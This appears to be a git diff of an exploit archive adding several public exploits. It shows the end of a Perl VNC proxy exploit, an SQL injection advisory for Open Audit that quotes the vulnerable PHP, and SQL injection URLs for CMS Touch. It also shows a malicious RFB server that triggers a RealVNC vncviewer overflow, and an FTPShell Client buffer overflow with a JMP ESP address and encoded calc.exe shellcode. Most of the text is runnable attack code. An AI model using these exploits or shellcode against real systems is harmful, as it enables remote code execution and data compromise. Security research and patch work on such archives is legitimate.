$fd->Send("\x01\x01");
# Start pumping data between the client and server
if (! fork()) {
$self->PrintLine("[*] Proxying data between the connections...");
$self->VNCProxy($s->Socket, $fd->Socket);
exit(0);
}
return;
}
sub VNCProxy {
my $self = shift;
my $srv = shift;
my $cli = shift;
foreach ($srv, $cli) {
$_->blocking(1);
$_->autoflush(1);
}
my $selector = IO::Select->new($srv, $cli);
LOOPER:
while(1) {
my @ready = $selector->can_read;
foreach my $ready (@ready) {
if($ready == $cli) {
my $data;
$cli->recv($data, 8192);
last LOOPER if (! length($data));
last LOOPER if(!$srv || !$srv->connected);
eval { $srv->send($data); };
last LOOPER if $@;
}
elsif($ready == $srv) {
my $data;
$srv->recv($data, 8192);
last LOOPER if(!length($data));
last LOOPER if(!$cli || !$cli->connected);
eval { $cli->send($data); };
last LOOPER if $@;
}
}
}
}
1;
# milw0rm.com [2006-05-15]

55
platforms/php/webapps/39150.txt Executable file
View file

@ -0,0 +1,55 @@
#Exploit Title : Open Audit SQL Injection Vulnerability
#Exploit Author : Rahul Pratap Singh
#Date : 2/Jan/2016
#Home page Link : https://github.com/jonabbey/open-audit
#Website : 0x62626262.wordpress.com
#Twitter : @0x62626262
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
1. Description
"id" field in software_add_license.php is not properly sanitized, that
leads to SQL Injection Vulnerability.
"pc" field in delete_system.php, list_viewdef_software_for_system.php and
system_export.php is not properly sanitized, that leads to SQL Injection
Vulnerability.
2. Vulnerable Code:
software_add_license.php: ( line 12 to 13)
$sql = "SELECT * from software_register WHERE software_reg_id = '" .
$_GET["id"] . "'";
$result = mysql_query($sql, $db);
delete_system.php: ( line 5 to 10)
if (isset($_GET['pc'])) {
$link = mysql_connect($mysql_server, $mysql_user, $mysql_password) or
die("Could not connect");
mysql_select_db("$mysql_database") or die("Could not select database");
$query = "select system_name from system where system_uuid='" .
$_GET['pc'] . "'";
$result = mysql_query($query) or die("Query failed at retrieve system
name stage.");
list_viewdef_software_for_system.php: ( line 2 to 3)
$sql = "SELECT system_os_type FROM system WHERE system_uuid = '" .
$_REQUEST["pc"] . "'";
$result = mysql_query($sql, $db);
system_export.php: ( line 108 to 112)
if(isset($_REQUEST["pc"]) AND $_REQUEST["pc"]!=""){
$pc=$_REQUEST["pc"];
$_GET["pc"]=$_REQUEST["pc"];
$sql = "SELECT system_uuid, system_timestamp, system_name FROM system
WHERE system_uuid = '$pc' OR system_name = '$pc' ";
$result = mysql_query($sql, $db);

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/67377/info
CMS Touch is prone to multiple SQL-injection and cross-site scripting vulnerabilities.
Successful exploits could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CMS Touch 2.01 is vulnerable; other versions may also be affected.
http://www.example.com/cmstouch/pages.php?Page_ID=[SQL]

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/67377/info
CMS Touch is prone to multiple SQL-injection and cross-site scripting vulnerabilities.
Successful exploits could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CMS Touch 2.01 is vulnerable; other versions may also be affected.
http://www.example.com/cmstouch/news.php?do=show&News_ID=[SQL]

14
platforms/windows/dos/39180.pl Executable file

File diff suppressed because one or more lines are too long

24
platforms/windows/dos/39181.py Executable file

File diff suppressed because one or more lines are too long

14
platforms/windows/dos/39183.py Executable file

File diff suppressed because one or more lines are too long

View file

@ -1,53 +1,53 @@
#!/usr/bin/env python
# POC: RealVNC 4.1.2 'vncviewer.exe' RFB Protocol Remote Code Execution Vulnerability, BID 30499
#Author: Andres Lopez Luksenberg <polakocai@gmail.com>
#
import socket
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('', 5900))
serversocket.listen(1)
while True:
clientsocket, clientaddres = serversocket.accept()
data = 'RFB 003.008\n'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print data_cli
data = '\x01\x01'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print repr(data_cli)
data = '\x00\x00\x00\x00'
clientsocket.sendall(data)
data = '\x02\xd0\x01\x77\x08\x08\x00\x00\x00\x07\x00\x07\x00\x03\x00\x03\x06\x00\x00\x00\x00\x00\x00\x13\x4c\x69\x6e\x75\x78\x56\x4e\x43\x3a\x20\x2f\x64\x65\x76\x2f\x74\x74\x79\x32'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print repr(data_cli)
data_cli = clientsocket.recv(1024)
print repr(data_cli)
data_cli = clientsocket.recv(1024)
print repr(data_cli)
data='\x00\x00\x00\x03\x00\x03\x00\x03\x00\x08\x00\x07'
data = data + '\x00\x00\xff\xff' #bug
data = data + '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe7\xe7\x7e\x3c\x7e\xe7\xe7'
clientsocket.sendall(data)
clientsocket.close()
serversocket.close()
# milw0rm.com [2009-02-02]
#!/usr/bin/env python
# POC: RealVNC 4.1.2 'vncviewer.exe' RFB Protocol Remote Code Execution Vulnerability, BID 30499
#Author: Andres Lopez Luksenberg <polakocai@gmail.com>
#
import socket
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('', 5900))
serversocket.listen(1)
while True:
clientsocket, clientaddres = serversocket.accept()
data = 'RFB 003.008\n'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print data_cli
data = '\x01\x01'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print repr(data_cli)
data = '\x00\x00\x00\x00'
clientsocket.sendall(data)
data = '\x02\xd0\x01\x77\x08\x08\x00\x00\x00\x07\x00\x07\x00\x03\x00\x03\x06\x00\x00\x00\x00\x00\x00\x13\x4c\x69\x6e\x75\x78\x56\x4e\x43\x3a\x20\x2f\x64\x65\x76\x2f\x74\x74\x79\x32'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print repr(data_cli)
data_cli = clientsocket.recv(1024)
print repr(data_cli)
data_cli = clientsocket.recv(1024)
print repr(data_cli)
data='\x00\x00\x00\x03\x00\x03\x00\x03\x00\x08\x00\x07'
data = data + '\x00\x00\xff\xff' #bug
data = data + '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe7\xe7\x7e\x3c\x7e\xe7\xe7'
clientsocket.sendall(data)
clientsocket.close()
serversocket.close()
# milw0rm.com [2009-02-02]

View file

@ -0,0 +1,79 @@
# Exploit Title: FTPShell Client 5.24 - Add to Favorites Buffer Overflow
# Google Dork: N/A
# Date: 2015-01-04
# Exploit Author: INSECT.B
# Twitter : @INSECT.B
# Facebook : https://www.facebook.com/B.INSECT00
# Blog : http://binsect00.tistory.com
# Vendor Homepage: www.ftpshell.com
# Software Link: http://www.ftpshell.com/download.htm
# Version: 5.24
# Tested on: Windows7 Ultimate SP1 K x86
# CVE : N/A
"""
[+] Type : Buffer Overflow
[-] ftpsehll client has a buffer overlow entry point in the [Favorites] - [Add to favorites..] 'Session name' input field
[-] used to add session to favorites list .
[+]Crash : input 'A' x 1500 to Session name field
[-] (4c4.8f8): Access violation - code c0000005 (!!! second chance !!!)
[-] eax=00000000 ebx=00944a0c ecx=00000000 edx=41414141 esi=00000500 edi=0012fe1c
[-] eip=41414141 esp=0012fd54 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
[-] cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
[-] 41414141 ?? ???
"""
import struct
junk = "A"*460
junk2 = "\x90"*248
esp = "\x0B\xD4\xDF\x73" # JMP ESP
#shellcode
#CMD : calc.exe
#encoder : Alpha-mix encoder
#buffer register : esp
sc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x38\x68" +
"\x4b\x32\x33\x30\x75\x50\x63\x30\x65\x30\x6c\x49\x5a\x45" +
"\x65\x61\x39\x50\x35\x34\x4c\x4b\x46\x30\x54\x70\x4e\x6b" +
"\x63\x62\x46\x6c\x6e\x6b\x43\x62\x47\x64\x4c\x4b\x44\x32" +
"\x46\x48\x74\x4f\x4f\x47\x51\x5a\x37\x56\x35\x61\x59\x6f" +
"\x6e\x4c\x45\x6c\x43\x51\x53\x4c\x43\x32\x44\x6c\x65\x70" +
"\x5a\x61\x5a\x6f\x74\x4d\x37\x71\x6a\x67\x4a\x42\x39\x62" +
"\x76\x32\x42\x77\x6c\x4b\x31\x42\x36\x70\x4e\x6b\x33\x7a" +
"\x57\x4c\x6e\x6b\x32\x6c\x66\x71\x42\x58\x78\x63\x53\x78" +
"\x73\x31\x7a\x71\x36\x31\x4e\x6b\x66\x39\x51\x30\x36\x61" +
"\x59\x43\x6e\x6b\x57\x39\x62\x38\x58\x63\x45\x6a\x52\x69" +
"\x6c\x4b\x44\x74\x4e\x6b\x55\x51\x7a\x76\x70\x31\x69\x6f" +
"\x6c\x6c\x6f\x31\x48\x4f\x36\x6d\x65\x51\x7a\x67\x76\x58" +
"\x59\x70\x61\x65\x48\x76\x53\x33\x71\x6d\x4b\x48\x35\x6b" +
"\x61\x6d\x36\x44\x31\x65\x4b\x54\x30\x58\x6e\x6b\x66\x38" +
"\x76\x44\x56\x61\x4e\x33\x51\x76\x6c\x4b\x74\x4c\x72\x6b" +
"\x6e\x6b\x71\x48\x47\x6c\x57\x71\x7a\x73\x4c\x4b\x66\x64" +
"\x6e\x6b\x36\x61\x6e\x30\x4d\x59\x50\x44\x57\x54\x66\x44" +
"\x63\x6b\x71\x4b\x61\x71\x63\x69\x61\x4a\x36\x31\x39\x6f" +
"\x59\x70\x61\x4f\x61\x4f\x52\x7a\x4c\x4b\x64\x52\x5a\x4b" +
"\x6e\x6d\x31\x4d\x32\x4a\x75\x51\x6c\x4d\x4b\x35\x48\x32" +
"\x75\x50\x65\x50\x67\x70\x66\x30\x73\x58\x65\x61\x4c\x4b" +
"\x52\x4f\x6b\x37\x59\x6f\x48\x55\x4d\x6b\x38\x70\x78\x35" +
"\x59\x32\x33\x66\x72\x48\x79\x36\x5a\x35\x6d\x6d\x4d\x4d" +
"\x6b\x4f\x58\x55\x45\x6c\x33\x36\x61\x6c\x76\x6a\x6b\x30" +
"\x6b\x4b\x4d\x30\x54\x35\x45\x55\x4f\x4b\x62\x67\x37\x63" +
"\x70\x72\x70\x6f\x70\x6a\x45\x50\x46\x33\x69\x6f\x49\x45" +
"\x50\x63\x65\x31\x50\x6c\x71\x73\x46\x4e\x42\x45\x70\x78" +
"\x73\x55\x75\x50\x41\x41"
)
payload = junk + esp + sc + junk2
file=open("C:\\shelll","w")
file.write(payload)
file.close()